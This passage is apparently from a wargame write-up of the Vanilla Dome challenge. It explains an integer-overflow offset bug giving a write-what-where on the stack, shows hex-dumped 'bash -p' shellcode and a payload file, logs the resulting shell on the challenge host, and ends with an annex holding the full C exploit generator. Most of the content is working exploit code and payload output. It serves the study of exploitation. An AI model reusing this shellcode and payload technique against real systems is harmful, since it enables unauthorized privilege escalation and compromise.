0x08048563 <+47>: mov DWORD PTR [eax],edx ; *value2 = value1;
; stack cookie check
0x08048565 <+49>: mov eax,DWORD PTR [ebp-0xc] ; stack cookie
0x08048568 <+52>: xor eax,DWORD PTR gs:0x14
0x0804856f <+59>: je 0x8048576 <insert+66>
0x08048571 <+61>: call 0x8048444 <__stack_chk_fail@plt>
0x08048576 <+66>: leave
0x08048577 <+67>: ret
End of assembler dump.
The interesting line is here:
0x0804855a <+38>: shl eax,0x2 ; value2 <<= 2;
Our offset is multiplied by 4.
We can thus manage to overflow our offset so it becomes 0.
We want 0x1 0000 0000 so offset will be equal to 0x4000 0000.
That's how we get the zero!
Let's try:
m101@m101-laptop:~/challenges/vanilla_dome$ ./exploit1 bash-p.bin payload.bin
sz_file = 33
rest = 1
n_elts = 9
6a 0b 58 99 | j.X.
52 66 68 2d | Rfh-
70 89 e1 52 | p..R
6a 68 68 2f | jhh/
62 61 73 68 | bash
2f 62 69 6e | /bin
89 e3 52 51 | ..RQ
53 89 e1 cd | S...
80 00 00 00 | ....
2d 31 37 32 32 32 38 33 31 35 38 61 61 61 61 61 61 61 61 | -1722283158aaaaaaaa
31 30 37 33 37 34 31 38 32 34 61 61 61 61 61 61 61 61 61 | 1073741824aaaaaaaaa
37 36 31 38 31 36 36 35 38 61 61 61 61 61 61 61 61 61 61 | 761816658aaaaaaaaaa
31 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 1aaaaaaaaaaaaaaaaaa
31 33 39 30 35 31 32 34 39 36 61 61 61 61 61 61 61 61 61 | 1390512496aaaaaaaaa
32 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 2aaaaaaaaaaaaaaaaaa
37 39 35 33 37 31 36 32 36 61 61 61 61 61 61 61 61 61 61 | 795371626aaaaaaaaaa
33 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 3aaaaaaaaaaaaaaaaaa
31 37 35 32 33 39 32 30 33 34 61 61 61 61 61 61 61 61 61 | 1752392034aaaaaaaaa
34 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 4aaaaaaaaaaaaaaaaaa
31 38 35 32 34 30 30 31 37 35 61 61 61 61 61 61 61 61 61 | 1852400175aaaaaaaaa
35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 5aaaaaaaaaaaaaaaaaa
31 33 36 34 33 38 36 36 39 37 61 61 61 61 61 61 61 61 61 | 1364386697aaaaaaaaa
36 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 6aaaaaaaaaaaaaaaaaa
2d 38 34 30 38 35 37 32 36 31 61 61 61 61 61 61 61 61 61 | -840857261aaaaaaaaa
37 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 7aaaaaaaaaaaaaaaaaa
31 32 38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 128aaaaaaaaaaaaaaaa
38 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | 8aaaaaaaaaaaaaaaaaa
31 33 34 35 31 34 35 33 35 61 61 61 61 61 61 61 61 61 61 | 134514535aaaaaaaaaa
2d 31 35 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 | -15aaaaaaaaaaaaaaaa
On the remote machine:
vanilla1@VanillaDome /tmp $ ~/Vanilla1 v1.3.txt
bash-4.1$ pwd
/tmp
bash-4.1$ cd
bash: cd: HOME not set
bash-4.1$ pwd
/tmp
bash-4.1$ cd ~
bash-4.1$ pwd
/home/vanilla1
Challenge completely owned :).
Conclusion
As you can see, with a bit of work, motivation and some vulnerability, you can
bypass protections.
ASLR was of no use here as we bypass it through offsets and pointers laying on
the stack.
RELRO didn't stop us as we can write on the stack with a write-what-where.
If NX were to be set, it wouldn't have stopped us either as we can still craft a
rop chain. The problem would more have to been about the number of available
gadgets.
That's all for today, hope you enjoyed it.
Cheers,
m_101
References:
-
bash -p payload
-
Vanilla Dome Wargame
-
RELRO: RELocation Read-Only
-
Reversing Linux : Comprendre le rôle des sections PLT et GOT dans l’édition de liens dynamique
Annex: The exploit
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
struct dpatch_t
{
char *value;
char *offset;
};
/*
8048767: 5b pop %ebx
8048768: 5d pop %ebp
8048769: c3 ret
*/
int get_fsize (FILE *fp);
int get_nelts (FILE *fp);
char *i2a (uint32_t value);
struct dpatch_t *fill_array (int off_buffer, struct dpatch_t *array, int n_elts, FILE *fp);
int dump (unsigned char *bytes, size_t nbytes, size_t align);
int main (int argc, char *argv[])
{
int n_elts;
int idx_array;
struct dpatch_t *array;
FILE *fp_in, *fp_out;
if (argc != 3) {
printf ("Usage: %s [input] [output]\n", argv[0]);
exit (1);
}
fp_in = fopen (argv[1], "r");
if (!fp_in)
return 1;
fp_out = fopen (argv[2], "w");
if (!fp_out)
return 1;
n_elts = get_nelts (fp_in);
// alloc array
array = calloc (n_elts + 200, sizeof(*array));
if (!array)
return 1;
// fill array with shellcode
fill_array (0, array, n_elts, fp_in);
// set trigger
array[n_elts].value = i2a (0x8048767);
array[n_elts].offset = i2a (-15);
// show debug
for (idx_array = 0; idx_array < n_elts + 2; idx_array++) {
if (array[idx_array].value && array[idx_array].value) {
dump (array[idx_array].value, strlen (array[idx_array].value), strlen (array[idx_array].value));
dump (array[idx_array].offset, strlen (array[idx_array].offset), strlen(array[idx_array].offset));
}
}
// create payload file
for (idx_array = 0; idx_array < n_elts + 2; idx_array++) {
if (array[idx_array].value && array[idx_array].value) {
fwrite (array[idx_array].value, 1, strlen(array[idx_array].value), fp_out);
fwrite (array[idx_array].offset, 1, strlen(array[idx_array].offset), fp_out);
}
}
fclose (fp_in);
fclose (fp_out);
return 0;
}
int get_fsize (FILE *fp)
{
int sz_file;
int old_offset;
old_offset = ftell (fp);
fseek (fp, 0, SEEK_END);
sz_file = ftell (fp);
fseek (fp, old_offset, SEEK_SET);
return sz_file;
}
int get_nelts (FILE *fp)
{
int sz_file;
int n_elts, rest;
// compute array n_elts
sz_file = get_fsize (fp);
rest = sz_file % 4;
n_elts = (sz_file - rest) / 4 + (rest > 0 ? 1 : 0);
printf ("sz_file = %d\n", sz_file);
printf ("rest = %d\n", rest);
printf ("n_elts = %d\n", n_elts);
return n_elts;
}
// integer to ascii
char *i2a (uint32_t value)
{
char *intstr;
int len_intstr;
intstr = calloc (21, sizeof(*intstr));
memset (intstr, 'a', 19);
snprintf (intstr, 19, "%d", value);
len_intstr = strlen (intstr);
if (intstr > 0)
intstr[len_intstr] = 'a';
return intstr;
}
struct dpatch_t *fill_array (int off_buffer, struct dpatch_t *array, int n_elts, FILE *fp)
{
// buffer
char *buffer;
// loop
int idx_array, idx_buffer;
int sz_file;
int rest;
sz_file = get_fsize (fp);
rest = sz_file % 4;
// alloc buffer
buffer = calloc (sz_file + (rest != 0 ? 4 : 0), sizeof(*buffer));
if (!buffer)
return NULL;
// read
fseek (fp, 0, SEEK_SET);
fread (buffer, sz_file, 1, fp);
// fix off_buffer
off_buffer = off_buffer / 4;
// construct array
for (idx_array = 0, idx_buffer = 0; idx_array < n_elts; idx_array++, idx_buffer++) {
dump (((uint32_t *) buffer + idx_buffer), 4, 16);
array[idx_array].value = i2a (*((uint32_t *) buffer + idx_buffer));
if (idx_buffer == 0 && off_buffer == 0)
array[idx_array].offset = i2a (0x40000000);
else
array[idx_array].offset = i2a (idx_buffer + off_buffer);
}
free (buffer);
return array;
}
// dump
int dump (unsigned char *bytes, size_t nbytes, size_t align)
{
size_t idx_bytes, j, last;
int n_disp;
if (!bytes || !nbytes)
return -1;
// first part of line is hex
for (idx_bytes = 0, last = 0; idx_bytes < nbytes; idx_bytes++) {
printf ("%02x ", bytes[idx_bytes]);
// if we got to the alignment value or end of bytes
// we print the second part of the line
if ( (idx_bytes + 1) % align == 0 || idx_bytes == nbytes - 1 ) {
// we print spaces if we arrived at end of bytes
if (idx_bytes == nbytes - 1) {
// compute the number of spaces to show
n_disp = align - (nbytes % align);
n_disp = (nbytes % align) ? n_disp : 0;
for (j = 0; j < n_disp; j++)
printf(" ");
}
// separation
printf ("| ");
// second part of line is corresponding character
for (j = last; j < last + align && j < nbytes; j++) {
if (isprint(bytes[j]))
printf ("%c", bytes[j]);
else
putchar ('.');
}
putchar ('\n');
last = idx_bytes + 1;
}
}
return 0;
}